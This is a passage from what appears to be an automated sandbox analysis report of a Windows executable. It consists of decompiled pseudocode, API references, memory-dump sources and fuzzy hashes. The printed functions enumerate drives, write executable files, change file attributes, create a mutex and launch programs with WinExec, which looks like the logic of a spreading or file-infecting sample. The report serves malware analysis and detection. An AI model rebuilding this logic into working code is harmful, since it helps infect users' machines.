				_push(E00406E03);
				return E00403094( &_v160);
			}











                                                                                                                          0x00406d41
                                                                                                                          0x00406d4e
                                                                                                                          0x00406d54
                                                                                                                          0x00406d58
                                                                                                                          0x00406d59
                                                                                                                          0x00406d5e
                                                                                                                          0x00406d61
                                                                                                                          0x00406d70
                                                                                                                          0x00406d75
                                                                                                                          0x00406dd5
                                                                                                                          0x00406d7b
                                                                                                                          0x00406d89
                                                                                                                          0x00406d91
                                                                                                                          0x00406dc0
                                                                                                                          0x00406dcd
                                                                                                                          0x00406dcd
                                                                                                                          0x00406dd2
                                                                                                                          0x00406dd2
                                                                                                                          0x00406de5
                                                                                                                          0x00406de8
                                                                                                                          0x00406deb
                                                                                                                          0x00406dfb

                                                                                                                          APIs
                                                                                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                                                                          • GetDriveTypeA.KERNEL32(00000000), ref: 00406D89
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Drive$LogicalStringsType
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1630765265-0
                                                                                                                          • Opcode ID: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                                                                          • Instruction ID: e1e1b0806745e30ff5eb453561950d2c3ef676df74625b4c39c06a75345551cd
                                                                                                                          • Opcode Fuzzy Hash: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                                                                          • Instruction Fuzzy Hash: 301159725181089EE720BE759C52BAA7FADDF45304F4644F7AA0DB32C3D9384D128A28
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004012A0, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004012A0(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401154(0x40a5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                                                          0x004012a3
                                                                                                                          0x004012ad
                                                                                                                          0x004012bc
                                                                                                                          0x004012af
                                                                                                                          0x004012af
                                                                                                                          0x004012af
                                                                                                                          0x004012c2
                                                                                                                          0x004012cf
                                                                                                                          0x004012d4
                                                                                                                          0x004012d6
                                                                                                                          0x004012da
                                                                                                                          0x004012e3
                                                                                                                          0x004012ea
                                                                                                                          0x004012f6
                                                                                                                          0x004012fd
                                                                                                                          0x00000000
                                                                                                                          0x004012fd
                                                                                                                          0x004012ea
                                                                                                                          0x00401302

                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2087232378-0
                                                                                                                          • Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                                                                          • Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
                                                                                                                          • Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                                                                          • Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00407D9C, Relevance: 1.6, APIs: 1, Instructions: 76processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 52%
                                                                                                                          			E00407D9C(char* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char* _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				void* _t49;
				intOrPtr _t56;
				void* _t63;
				intOrPtr _t66;

				_t62 = __esi;
				_t61 = __edi;
				_t48 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t66);
				_push(0x407e75);
				_push( *[fs:eax]);
				 *[fs:eax] = _t66;
				if( *_v8 != 0x5c) {
					E00407BD4(_v8, __ebx, __esi); // executed
				} else {
					E004071D0(_v8, __ebx, __edi, __esi);
				}
				_t63 = E00404AE8(_t48, _t61, _t62);
				if(_t63 > 0) {
					_t49 = 1;
					do {
						E004049D0(_t49, _t49,  &_v12, _t61, _t63);
						if( *_v12 != 0x5c) {
							E004049D0(_t49, _t49,  &_v20, _t61, _t63);
							E00407BD4(_v20, _t49, _t63); // executed
						} else {
							E004049D0(_t49, _t49,  &_v16, _t61, _t63);
							E004071D0(_v16, _t49, _t61, _t63);
						}
						_t49 = _t49 + 1;
						_t63 = _t63 - 1;
					} while (_t63 != 0);
				}
				_push(1);
				_push(_v8);
				_push(E00407E8C);
				E00406F34(0, _t48,  &_v28, _t61, _t63);
				E004032CC();
				WinExec(E0040340C(_v24), _v28); // executed
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(E00407E7C);
				return E004030B8( &_v28, 6);
			}













                                                                                                                          0x00407d9c
                                                                                                                          0x00407d9c
                                                                                                                          0x00407d9c
                                                                                                                          0x00407da1
                                                                                                                          0x00407da2
                                                                                                                          0x00407da3
                                                                                                                          0x00407da4
                                                                                                                          0x00407da5
                                                                                                                          0x00407da6
                                                                                                                          0x00407da7
                                                                                                                          0x00407da8
                                                                                                                          0x00407da9
                                                                                                                          0x00407daf
                                                                                                                          0x00407db6
                                                                                                                          0x00407db7
                                                                                                                          0x00407dbc
                                                                                                                          0x00407dbf
                                                                                                                          0x00407dc8
                                                                                                                          0x00407dd7
                                                                                                                          0x00407dca
                                                                                                                          0x00407dcd
                                                                                                                          0x00407dcd
                                                                                                                          0x00407de1
                                                                                                                          0x00407de5
                                                                                                                          0x00407de7
                                                                                                                          0x00407dec
                                                                                                                          0x00407df1
                                                                                                                          0x00407dfc
                                                                                                                          0x00407e17
                                                                                                                          0x00407e1f
                                                                                                                          0x00407dfe
                                                                                                                          0x00407e03
                                                                                                                          0x00407e0b
                                                                                                                          0x00407e0b
                                                                                                                          0x00407e24
                                                                                                                          0x00407e25
                                                                                                                          0x00407e25
                                                                                                                          0x00407dec
                                                                                                                          0x00407e28
                                                                                                                          0x00407e2a
                                                                                                                          0x00407e2d
                                                                                                                          0x00407e37
                                                                                                                          0x00407e47
                                                                                                                          0x00407e55
                                                                                                                          0x00407e5c
                                                                                                                          0x00407e5f
                                                                                                                          0x00407e62
                                                                                                                          0x00407e74

                                                                                                                          APIs
                                                                                                                          • WinExec.KERNEL32 ref: 00407E55
                                                                                                                            • Part of subcall function 004071D0: GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                                                                            • Part of subcall function 004071D0: SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                                                                            • Part of subcall function 00407BD4: GetFileAttributesA.KERNEL32(00000000,00000000,00407D8D), ref: 00407C7C
                                                                                                                            • Part of subcall function 00407BD4: SetFileAttributesA.KERNEL32(00000000,00000000), ref: 00407C90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$ExecModuleName
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1864538708-0
                                                                                                                          • Opcode ID: 2dd2dee9ac6b51d1a558883945a056b3e2b38872fad6aa3749e99bffffc21bfb
                                                                                                                          • Instruction ID: 40707d73a39ba7ecc7968a88c6b1cf4d961407a3323fd5b51122ef1c80257f0a
                                                                                                                          • Opcode Fuzzy Hash: 2dd2dee9ac6b51d1a558883945a056b3e2b38872fad6aa3749e99bffffc21bfb
                                                                                                                          • Instruction Fuzzy Hash: C5216570E04209AFDB01EBA5CC82AAF77B8EF44304F5044BBB500B72D1D67CAE05979A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405E50, Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 70%
                                                                                                                          			E00405E50(void* __eax, void* __ecx, void* __edx) {
				void* _t8;
				void* _t11;
				void* _t13;
				long _t14;
				void* _t21;
				void* _t23;
				void* _t32;
				void* _t33;

				_push(__eax);
				_t8 = E00404B68(__edx, 0x40000400) + 1;
				if(_t8 != 0) {
					_t23 = _t8 - 1;
					_pop(_t11);
					E00405D30(_t11, _t33);
					_t13 = 0;
					_t14 = E0040320C(_t13);
					_t32 = _t13;
					_push(_t32);
					E00404BE0(_t23, _t14, _t32);
					SetEndOfFile(_t23); // executed
					E00404B90(_t23);
					_t21 = E004044A8();
					_push(_t32);
					_t8 = _t21 + 1;
				}
				return _t8;
			}











                                                                                                                          0x00405e51
                                                                                                                          0x00405e5d
                                                                                                                          0x00405e5e
                                                                                                                          0x00405e61
                                                                                                                          0x00405e62
                                                                                                                          0x00405e67
                                                                                                                          0x00405e6c
                                                                                                                          0x00405e6e
                                                                                                                          0x00405e74
                                                                                                                          0x00405e75
                                                                                                                          0x00405e78
                                                                                                                          0x00405e7e
                                                                                                                          0x00405e84
                                                                                                                          0x00405e89
                                                                                                                          0x00405e8e
                                                                                                                          0x00405e8f
                                                                                                                          0x00405e8f
                                                                                                                          0x00405e92

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                                                                          • SetEndOfFile.KERNEL32(?,00000000,?,00407FE8,00000000,00407FFE,?,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000), ref: 00405E7E
                                                                                                                            • Part of subcall function 00404B90: CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1065093856-0
                                                                                                                          • Opcode ID: 8c09bd4d963a50a7faf13c3890e17a4b6a86585bbbe459f83c5b676390fd9176
                                                                                                                          • Instruction ID: 282573299c96567a49cd7015b4ad24297c06c8278f95cf55d9cf1746db26bc01
                                                                                                                          • Opcode Fuzzy Hash: 8c09bd4d963a50a7faf13c3890e17a4b6a86585bbbe459f83c5b676390fd9176
                                                                                                                          • Instruction Fuzzy Hash: 58E092E1289A611DE202B6662CA7B2E6119CAC021DF61983FB605EB1C3C93DD80600AC
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404808, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404808(void* __eax, CHAR** __edx) {
				void* _t7;
				long _t9;
				long _t10;
				CHAR** _t14;
				void* _t15;

				_t14 = __edx;
				_t15 = __eax;
				_t10 = E0040320C(__eax);
				_t7 = E00403184(__edx, _t10, E0040340C(_t15));
				if(_t10 > 0) {
					_t9 = CharLowerBuffA( *_t14, _t10); // executed
					return _t9;
				}
				return _t7;
			}








                                                                                                                          0x0040480b
                                                                                                                          0x0040480d
                                                                                                                          0x00404816
                                                                                                                          0x00404825
                                                                                                                          0x0040482c
                                                                                                                          0x00404832
                                                                                                                          0x00000000
                                                                                                                          0x00404832
                                                                                                                          0x0040483a

                                                                                                                          APIs
                                                                                                                          • CharLowerBuffA.USER32(00000000,00000000,?,?,?,004048BE,00000000,00000000,?,0040558D,00000000,00405611,?,00000000,?,00000000), ref: 00404832
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharLower
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2358735015-0
                                                                                                                          • Opcode ID: 77ff168e13d2d29f1b12420b26d373017b2423865bfbd764805228717caed2c8
                                                                                                                          • Instruction ID: c09f9eebdd676df2f73b89bb3c73fd995db2893554e7900a9a0ed4ebbaba9e65
                                                                                                                          • Opcode Fuzzy Hash: 77ff168e13d2d29f1b12420b26d373017b2423865bfbd764805228717caed2c8
                                                                                                                          • Instruction Fuzzy Hash: 74D017A2300124178200BAAF08C595A9ACD4ED82A6314443FB618EB383EE78CD06026C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406CA8, Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406CA8(void* __eax, int __ecx, void* __edx) {
				char* _t6;
				void* _t7;
				void* _t8;
				void* _t11;
				int _t16;

				_t16 = __ecx;
				_t11 = __eax;
				E004064E4(__eax);
				_t6 = E0040340C(__edx);
				_t7 =  *0x40a650; // 0x400000
				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
				if(_t8 > 1) {
					return E00406520(_t11, _t8);
				}
				return _t8;
			}








                                                                                                                          0x00406cab
                                                                                                                          0x00406caf
                                                                                                                          0x00406cb3
                                                                                                                          0x00406cbb
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc7
                                                                                                                          0x00406ccf
                                                                                                                          0x00000000
                                                                                                                          0x00406cd4
                                                                                                                          0x00406cdc

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7
                                                                                                                            • Part of subcall function 00406520: GetIconInfo.USER32(?), ref: 00406540
                                                                                                                            • Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
                                                                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$DeleteIcon$CursorDestroyExtractInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2619871307-0
                                                                                                                          • Opcode ID: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                                                                          • Instruction ID: 3dd68c7f1dd4f5608f9b9662a0ba171f3b5b53225b24c93893625578eb0e5390
                                                                                                                          • Opcode Fuzzy Hash: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                                                                          • Instruction Fuzzy Hash: 32D05E767002202BC321B6BF2CC181B8ADDCACA269316453FB109F7293C97DCC12126D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404F34, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404F34(void* __eax, void* __edx) {
				char _v268;
				long _t6;
				void* _t13;
				void* _t14;

				_t13 = __edx;
				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
				return E00403184(_t13, _t6, _t14);
			}







                                                                                                                          0x00404f3c
                                                                                                                          0x00404f52
                                                                                                                          0x00404f6a

                                                                                                                          APIs
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00404F52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: NamePathShort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1295925010-0
                                                                                                                          • Opcode ID: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                                                                          • Instruction ID: 14e814bc68ad69d6c3dbd45ca29a6777f0e45ac5a2bbd03733d3eefc14da3dab
                                                                                                                          • Opcode Fuzzy Hash: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                                                                          • Instruction Fuzzy Hash: C9D05EE1B0021027D200B66D1CC2A9BA6CC4B88729F14413A7758EB2D2E9798E1402D9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404B68, Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 66%
                                                                                                                          			E00404B68(CHAR* __eax, unsigned int __edx) {
				CHAR* _t1;
				void* _t2;
				long _t6;
				long _t9;

				_t9 = __edx;
				_t1 = __eax;
				_push(0);
				_t6 = __edx >> 0x00000010 & 0x00001fff;
				if(_t6 == 0) {
					_t6 = 0x80;
				}
				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
				return _t2;
			}







                                                                                                                          0x00404b68
                                                                                                                          0x00404b68
                                                                                                                          0x00404b6a
                                                                                                                          0x00404b70
                                                                                                                          0x00404b75
                                                                                                                          0x00404b77
                                                                                                                          0x00404b77
                                                                                                                          0x00404b88
                                                                                                                          0x00404b8d

                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                                                                          • Instruction ID: ecc9e2cd6cddaadd7fb33e9927afed1fcbe410aa9616ae81c498ff4a473f225f
                                                                                                                          • Opcode Fuzzy Hash: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                                                                          • Instruction Fuzzy Hash: F9C012E15641113EFA0C22587C37FBB128D83D4714C90962EB206A77D1C458280041AC
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404018, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                                                                                          0x0040401b
                                                                                                                          0x00404023
                                                                                                                          0x0040402e
                                                                                                                          0x00404034

                                                                                                                          APIs
                                                                                                                          • CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateMutex
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1964310414-0
                                                                                                                          • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                          • Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
                                                                                                                          • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                          • Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404B9C, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404B9C() {
				void* _t3;
				long _t5;
				void* _t6;
				void* _t10;

				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
				_t6 = _t5 + 1;
				_t10 = _t6;
				if(_t10 != 0) {
					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
				}
				return _t6;
			}







                                                                                                                          0x00404ba2
                                                                                                                          0x00404ba7
                                                                                                                          0x00404ba7
                                                                                                                          0x00404ba8
                                                                                                                          0x00000000
                                                                                                                          0x00404bad
                                                                                                                          0x00404bb0

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: f0e2935d6735992bbc1d1517f7f0ae46d2a9bb3647fd1b02a3c043829b286a3b
                                                                                                                          • Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
                                                                                                                          • Opcode Fuzzy Hash: f0e2935d6735992bbc1d1517f7f0ae46d2a9bb3647fd1b02a3c043829b286a3b
                                                                                                                          • Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404BB4, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BB4(void* __eax, signed int __ecx, long __edx) {
				long _t2;

				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
				return _t2;
			}




                                                                                                                          0x00404bbc
                                                                                                                          0x00404bc1

                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                                                                          • Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
                                                                                                                          • Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                                                                          • Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040137C, Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x40a5d4; // 0x40a5d4
				while(_t35 != 0x40a5d4) {
					_t42 =  *_t35;
					_t5 = _t35 + 8; // 0x0
					_t43 =  *_t5;
					if(_t44 <= _t43) {
						_t6 = _t35 + 0xc; // 0x0
						if(_t43 +  *_t6 <= _v20) {
							if(_t43 < _v28) {
								_v28 = _t43;
							}
							_t10 = _t35 + 0xc; // 0x0
							_t31 = _t43 +  *_t10;
							if(_t31 > _v24) {
								_v24 = _t31;
							}
							_t32 = VirtualFree(_t43, 0, 0x8000); // executed
							if(_t32 == 0) {
								 *0x40a5b0 = 1;
							}
							E00401184(_t35);
						}
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 == 0) {
					return _t24;
				}
				 *_v32 = _v28;
				_t27 = _v24 - _v28;
				 *((intOrPtr*)(_v32 + 4)) = _t27;
				return _t27;
			}
















